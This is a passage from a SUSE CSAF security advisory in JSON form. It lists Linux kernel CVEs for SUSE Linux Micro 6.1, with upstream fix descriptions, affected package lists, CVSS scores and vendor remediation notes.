"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68351"
},
{
"cve": "CVE-2025-68354",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68354"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: core: Protect regulator_supply_alias_list with regulator_list_mutex\n\nregulator_supply_alias_list was accessed without any locking in\nregulator_supply_alias(), regulator_register_supply_alias(), and\nregulator_unregister_supply_alias(). Concurrent registration,\nunregistration and lookups can race, leading to:\n\n1 use-after-free if an alias entry is removed while being read,\n2 duplicate entries when two threads register the same alias,\n3 inconsistent alias mappings observed by consumers.\n\nProtect all traversals, insertions and deletions on\nregulator_supply_alias_list with the existing regulator_list_mutex.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68354",
"url": "https://www.suse.com/security/cve/CVE-2025-68354"
},
{
"category": "external",
"summary": "SUSE Bug 1255553 for CVE-2025-68354",
"url": "https://bugzilla.suse.com/1255553"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68354"
},
{
"cve": "CVE-2025-68362",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68362"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl818x: rtl8187: Fix potential buffer underflow in rtl8187_rx_cb()\n\nThe rtl8187_rx_cb() calculates the rx descriptor header address\nby subtracting its size from the skb tail pointer.\nHowever, it does not validate if the received packet\n(skb-\u003elen from urb-\u003eactual_length) is large enough to contain this\nheader.\n\nIf a truncated packet is received, this will lead to a buffer\nunderflow, reading memory before the start of the skb data area,\nand causing a kernel panic.\n\nAdd length checks for both rtl8187 and rtl8187b descriptor headers\nbefore attempting to access them, dropping the packet cleanly if the\ncheck fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68362",
"url": "https://www.suse.com/security/cve/CVE-2025-68362"
},
{
"category": "external",
"summary": "SUSE Bug 1255611 for CVE-2025-68362",
"url": "https://bugzilla.suse.com/1255611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68362"
},
{
"cve": "CVE-2025-68363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu\n\nThe bpf_skb_check_mtu helper needs to use skb-\u003etransport_header when\nthe BPF_MTU_CHK_SEGS flag is used:\n\n\tbpf_skb_check_mtu(skb, ifindex, \u0026mtu_len, 0, BPF_MTU_CHK_SEGS)\n\nThe transport_header is not always set. There is a WARN_ON_ONCE\nreport when CONFIG_DEBUG_NET is enabled + skb-\u003egso_size is set +\nbpf_prog_test_run is used:\n\nWARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071\n skb_gso_validate_network_len\n bpf_skb_check_mtu\n bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch\n bpf_test_run\n bpf_prog_test_run_skb\n\nFor a normal ingress skb (not test_run), skb_reset_transport_header\nis performed but there is plan to avoid setting it as described in\ncommit 2170a1f09148 (\"net: no longer reset transport_header in __netif_receive_skb_core()\").\n\nThis patch fixes the bpf helper by checking\nskb_transport_header_was_set(). The check is done just before\nskb-\u003etransport_header is used, to avoid breaking the existing bpf prog.\nThe WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68363",
"url": "https://www.suse.com/security/cve/CVE-2025-68363"
},
{
"category": "external",
"summary": "SUSE Bug 1255552 for CVE-2025-68363",
"url": "https://bugzilla.suse.com/1255552"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68363"
},
{
"cve": "CVE-2025-68365",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68365"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68365",
"url": "https://www.suse.com/security/cve/CVE-2025-68365"
},
{
"category": "external",
"summary": "SUSE Bug 1255548 for CVE-2025-68365",
"url": "https://bugzilla.suse.com/1255548"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68365"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
